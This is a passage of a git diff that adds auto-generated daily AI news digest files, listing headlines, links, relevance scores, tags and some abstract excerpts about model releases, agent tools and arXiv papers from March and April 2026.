+ +--- + +## [Building a coding agent in Swift from scratch](https://github.com/ivan-magda/swift-claude-code) +*Hacker News* | 25/03/2026 | Score: 0.70 +Tags: agent_tool + +--- + +## [Show HN: DuckDB community extension for prefiltered HNSW using ACORN-1](https://github.com/cigrainger/duckdb-hnsw-acorn) +*Hacker News* | 25/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [Rendering complex scripts in terminal and OSC 66](https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/) +*Hacker News* | 22/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Open source isn't a tip jar – it's time to charge for access](https://www.theregister.com/2026/03/25/open_source_bill_opinion/) +*Hacker News* | 25/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-26.md b/data/digest-2026-03-26.md new file mode 100644 index 0000000..f46f6ad --- /dev/null +++ b/data/digest-2026-03-26.md @@ -0,0 +1,51 @@ +# Stack Scout - AI News Digest +**2026-03-26** | 7 stories | Auto-generated from 95 archived stories + +--- + +## [Cohere launches an open source voice model specifically for transcription](https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/) +*TechCrunch AI* | 26/03/2026 | Score: 1.00 +Tags: product_launch, open_source + +> Relatively light at just 2 billion parameters, the model is meant for use with consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages. + +--- + +## [Mistral releases a new open source model for speech generation](https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/) +*TechCrunch AI* | 26/03/2026 | Score: 1.00 +Tags: product_launch, open_source + +> The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI. 
+ +--- + +## [Intel Announces Arc Pro B70 and Arc Pro B65 GPUs](https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture) +*Hacker News* | 26/03/2026 | Score: 0.92 +Tags: product_launch + +--- + +## [Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer](https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/) +*Hacker News* | 26/03/2026 | Score: 0.78 +Tags: agent_tool + +--- + +## [Show HN: Relay – The open-source Claude Cowork for OpenClaw](https://github.com/SeventeenLabs/relay) +*Hacker News* | 26/03/2026 | Score: 0.71 +Tags: open_source + +--- + +## [Stripe Projects: Provision and manage services from the CLI](https://projects.dev/) +*Hacker News* | 26/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Shell Tricks That Make Life Easier (and Save Your Sanity)](https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/) +*Hacker News* | 26/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-27.md b/data/digest-2026-03-27.md new file mode 100644 index 0000000..5d784c5 --- /dev/null +++ b/data/digest-2026-03-27.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-03-27** | 5 stories | Auto-generated from 86 archived stories + +--- + +## [Nashville library launches Memory Lab for digitizing home movies](https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies) +*Hacker News* | 24/03/2026 | Score: 0.84 +Tags: product_launch, developer_tool + +--- + +## [Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents](https://github.com/outworked/outworked/releases/tag/v0.3.0) +*Hacker News* | 27/03/2026 | Score: 0.77 +Tags: open_source + +--- + +## [Telnyx package compromised on PyPI](https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm) +*Hacker News* | 27/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [Telnyx package compromised on 
PyPI](https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026) +*Hacker News* | 27/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [Show HN: Minimalist library to generate SVG views of scientific data](https://github.com/alefore/mini_svg/) +*Hacker News* | 23/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-28.md b/data/digest-2026-03-28.md new file mode 100644 index 0000000..42faafe --- /dev/null +++ b/data/digest-2026-03-28.md @@ -0,0 +1,29 @@ +# Stack Scout - AI News Digest +**2026-03-28** | 4 stories | Auto-generated from 67 archived stories + +--- + +## [Arm releases first in-house chip, with Meta as debut customer](https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html) +*Hacker News* | 24/03/2026 | Score: 0.92 +Tags: product_launch + +--- + +## [Improving personal tax filing with Claude CLI and Obsidian](https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian) +*Hacker News* | 28/03/2026 | Score: 0.73 +Tags: cli_tool + +--- + +## [Improved Git Diffs with Delta, Fzf and a Little Shell Scripting](https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting) +*Hacker News* | 24/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [OpenCiv1 – open-source rewrite of Civ1](https://github.com/rajko-horvat/OpenCiv1) +*Hacker News* | 28/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-29.md b/data/digest-2026-03-29.md new file mode 100644 index 0000000..4e410a6 --- /dev/null +++ b/data/digest-2026-03-29.md @@ -0,0 +1,23 @@ +# Stack Scout - AI News Digest +**2026-03-29** | 3 stories | Auto-generated from 57 archived stories + +--- + +## [Figma's MCP Update Reflects a Larger Industry Shift](https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal) +*Hacker News* | 29/03/2026 | Score: 0.82 +Tags: mcp + +--- + +## [OpenYak – An open-source Cowork that runs 
any model and owns your filesystem](https://github.com/openyak/desktop) +*Hacker News* | 29/03/2026 | Score: 0.82 +Tags: open_source + +--- + +## [Pretext: TypeScript library for multiline text measurement and layout](https://github.com/chenglou/pretext) +*Hacker News* | 28/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-30.md b/data/digest-2026-03-30.md new file mode 100644 index 0000000..545fc5d --- /dev/null +++ b/data/digest-2026-03-30.md @@ -0,0 +1,19 @@ +# Stack Scout - AI News Digest +**2026-03-30** | 2 stories | Auto-generated from 75 archived stories + +--- + +## [There are more AI health tools than ever—but how well do they work?](https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/) +*MIT Tech Review AI* | 30/03/2026 | Score: 0.91 +Tags: tool_update + +> Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. 
A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would… + +--- + +## [Build123d: A Python CAD programming library](https://github.com/gumyr/build123d) +*Hacker News* | 29/03/2026 | Score: 0.49 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-31.md b/data/digest-2026-03-31.md new file mode 100644 index 0000000..57b1dec --- /dev/null +++ b/data/digest-2026-03-31.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-03-31** | 15 stories | Auto-generated from 533 archived stories + +--- + +## [A Regression Framework for Understanding Prompt Component Impact on LLM Performance](https://arxiv.org/abs/2603.26830) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: open_source, developer_tool, tool_update + +> arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. 
The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task. + +--- + +## [LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA](https://blog.langchain.com/nvidia-enterprise/) +*LangChain Blog* | 16/03/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration + +--- + +## [Systematic debugging for AI agents: Introducing the AgentRx framework](https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/) +*Microsoft Research Blog* | 12/03/2026 | Score: 1.00 +Tags: api_update, developer_tool, agent_tool + +> As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research . + +--- + +## [Autonomous context compression](https://blog.langchain.com/autonomous-context-compression/) +*LangChain Blog* | 11/03/2026 | Score: 0.86 +Tags: api_update, developer_tool, cli_tool + +> TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. 
Older messages are replaced by + +--- + +## [Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals](https://arxiv.org/abs/2603.26829) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design. 
+ +--- + +## [A Step Toward Federated Pretraining of Multimodal Large Language Models](https://arxiv.org/abs/2603.26786) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines. 
+ +--- + +## [TED: Training-Free Experience Distillation for Multimodal Reasoning](https://arxiv.org/abs/2603.26778) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: developer_tool, tool_update + +> arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience. 
+ +--- + +## [EpochX: Building the Infrastructure for an Emergent Agent Civilization](https://arxiv.org/abs/2603.27304) +*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 +Tags: api_update, product_launch + +> arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration. 
+ +--- + +## [Bitboard version of Tetris AI](https://arxiv.org/abs/2603.26765) +*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 +Tags: developer_tool, tool_update + +> arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research. 
+ +--- + +## [Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0](https://www.together.ai/blog/nvidia-nemotron-3-super) +*Together AI Blog* | 11/03/2026 | Score: 1.00 +Tags: api_update, product_launch + +> NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure. + +--- + +## [Together Evaluations now supports comparing top commercial APIs vs. open source models](https://www.together.ai/blog/together-evaluations-v2) +*Together AI Blog* | 02/02/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform. + +--- + +## [Introducing deploy cli](https://blog.langchain.com/introducing-deploy-cli/) +*LangChain Blog* | 16/03/2026 | Score: 0.69 +Tags: developer_tool, cli_tool + +> We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in + +--- + +## [Introducing LangSmith Sandboxes: Secure Code Execution for Agents](https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/) +*LangChain Blog* | 17/03/2026 | Score: 0.62 +Tags: api_update, developer_tool + +> Spin up a sandbox in a single line of code with the LangSmith SDK. Now in Private Preview. 
+ +--- + +## [Open SWE: An Open-Source Framework for Internal Coding Agents](https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/) +*LangChain Blog* | 17/03/2026 | Score: 0.62 +Tags: open_source, developer_tool + +> Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents. + +--- + +## [Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups](https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/) +*TechCrunch AI* | 31/03/2026 | Score: 1.00 +Tags: product_launch + +> Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications. + +--- + diff --git a/data/digest-2026-04-01.md b/data/digest-2026-04-01.md new file mode 100644 index 0000000..d23eb8c --- /dev/null +++ b/data/digest-2026-04-01.md @@ -0,0 +1,95 @@ +# Stack Scout - AI News Digest +**2026-04-01** | 15 stories | Auto-generated from 894 archived stories + +--- + +## [MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding](https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/) +*MarkTechPost* | Score: 1.00 +Tags: api_update, product_launch, tool_update + +--- + +## [Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP](https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/) +*MarkTechPost* | Score: 1.00 +Tags: mcp, product_launch, cli_tool + +--- + +## [UT Austin and ServiceNow Research Team 
Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs](https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API](https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/) +*MarkTechPost* | Score: 1.00 +Tags: api_update, product_launch + +--- + +## [Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.](https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/) +*Google AI Blog* | Score: 1.00 +Tags: api_update, mcp + +--- + +## [Introducing Claude Opus 4.6 (Announcements, Feb 5, 2026): We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.](https://www.anthropic.com/news/claude-opus-4-6) +*Anthropic News* | Score: 1.00 +Tags: api_update, agent_tool + +--- + +## [Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)](https://github.com/yannick-cw/korb) +*Hacker News* | 30/03/2026 | Score: 0.74 +Tags: api_update, cli_tool + +--- + +## [Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production](https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production) +*Stability AI Blog* | Score: 1.00 +Tags: product_launch + +--- + +## [NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem](https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/) +*NVIDIA AI Blog* | Score: 
1.00 +Tags: product_launch + +--- + +## [An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal](https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/) +*MarkTechPost* | Score: 1.00 +Tags: api_update + +--- + +## [How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models](https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/) +*MarkTechPost* | Score: 1.00 +Tags: open_source + +--- + +## [Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x](https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows](https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [Salesforce announces an AI-heavy makeover for Slack, with 30 new features](https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [How I contributed a new model to the Transformers library using Codex](https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex) +*Hugging Face Blog* | Score: 1.00 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-04-02.md 
b/data/digest-2026-04-02.md new file mode 100644 index 0000000..d9d990c --- /dev/null +++ b/data/digest-2026-04-02.md @@ -0,0 +1,71 @@ +# Stack Scout - AI News Digest +**2026-04-02** | 11 stories | Auto-generated from 120 archived stories + +--- + +## [Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks](https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter) +*VentureBeat AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex](https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/) +*Wired AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Google announces Gemma 4 open AI models, switches to Apache 2.0 license](https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/) +*Ars Technica AI* | Score: 0.98 +Tags: product_launch, open_source + +--- + +## [Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere](https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [IBM Announces Strategic Collaboration with Arm](https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing) +*Hacker News* | 02/04/2026 | Score: 0.98 +Tags: product_launch + +--- + +## [IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction](https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/) +*MarkTechPost* | Score: 0.90 +Tags: 
product_launch + +--- + +## [Google releases Gemma 4 open models](https://deepmind.google/models/gemma/gemma-4/) +*Hacker News* | 02/04/2026 | Score: 0.90 +Tags: product_launch + +--- + +## [Lemonade by AMD: a fast and open source local LLM server using GPU and NPU](https://lemonade-server.ai) +*Hacker News* | 02/04/2026 | Score: 0.82 +Tags: open_source + +--- + +## [Artemis II, NASA's boldest mission in generations, launches crew to the Moon](https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/) +*Ars Technica AI* | Score: 0.66 +Tags: product_launch + +--- + +## [Delve allegedly forked an open-source tool and sold it as its own](https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/) +*Hacker News* | 02/04/2026 | Score: 0.66 +Tags: open_source + +--- + +## [Python API usage](https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage) +*Simon Willison's Blog* | Score: 0.66 +Tags: api_update + +--- + diff --git a/data/digest-2026-04-03.md b/data/digest-2026-04-03.md new file mode 100644 index 0000000..702b24b --- /dev/null +++ b/data/digest-2026-04-03.md @@ -0,0 +1,47 @@ +# Stack Scout - AI News Digest +**2026-04-03** | 7 stories | Auto-generated from 351 archived stories + +--- + +## [Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use](https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/) +*MarkTechPost* | Score: 1.00 +Tags: api_update, product_launch, open_source + +--- + +## [TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language 
Prompts](https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [New ways to balance cost and reliability in the Gemini API](https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/) +*Google AI Blog* | Score: 0.94 +Tags: api_update + +--- + +## [C89cc.sh – standalone C89/ELF64 compiler in pure portable shell](https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19) +*Hacker News* | 01/04/2026 | Score: 0.74 +Tags: cli_tool + +--- + +## [Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. (+ Skill Package)](https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you) +*Nate's Newsletter* | Score: 0.68 +Tags: developer_tool + +--- + +## [Google Vids extension](https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm) +*The Verge AI* | Score: 0.68 +Tags: developer_tool + +--- + +## [Post Mortem: axios NPM supply chain compromise](https://github.com/axios/axios/issues/10636) +*Simon Willison's Blog* | 03/04/2026 | Score: 0.68 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-04-04.md b/data/digest-2026-04-04.md new file mode 100644 index 0000000..c893c6e --- /dev/null +++ b/data/digest-2026-04-04.md @@ -0,0 +1,39 @@ +# Stack Scout - AI News Digest +**2026-04-04** | 5 stories | Auto-generated from 236 archived stories + +--- + +## [@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision](https://x.com/CloudflareDev/status/2040459229039940068) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> @CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B active parameters, 256K context window, tool calling, reasoning, and 
vision capabilities. + +--- + +## [YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt?](https://huggingface.co/blog/collinear-ai/yc-bench) +*Hugging Face Blog* | Score: 1.00 +Tags: agent_tool + +--- + +## [@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users](https://x.com/synthwavedd/status/2040442540508287101) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: tool_update + +> @synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement. + +--- + +## [Components of A Coding Agent](https://magazine.sebastianraschka.com/p/components-of-a-coding-agent) +*Sebastian Raschka* | Score: 0.86 +Tags: agent_tool + +--- + +## [RAG-Anything: All-in-One RAG Framework](https://paperswithcode.com/papers/2510.12323) +*Papers With Code* | Score: 0.76 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-04-05.md b/data/digest-2026-04-05.md new file mode 100644 index 0000000..412e7d2 --- /dev/null +++ b/data/digest-2026-04-05.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-05** | 15 stories | Auto-generated from 210 archived stories + +--- + +## [Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0](https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: product_launch, developer_tool, cli_tool, tool_update + +> Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, 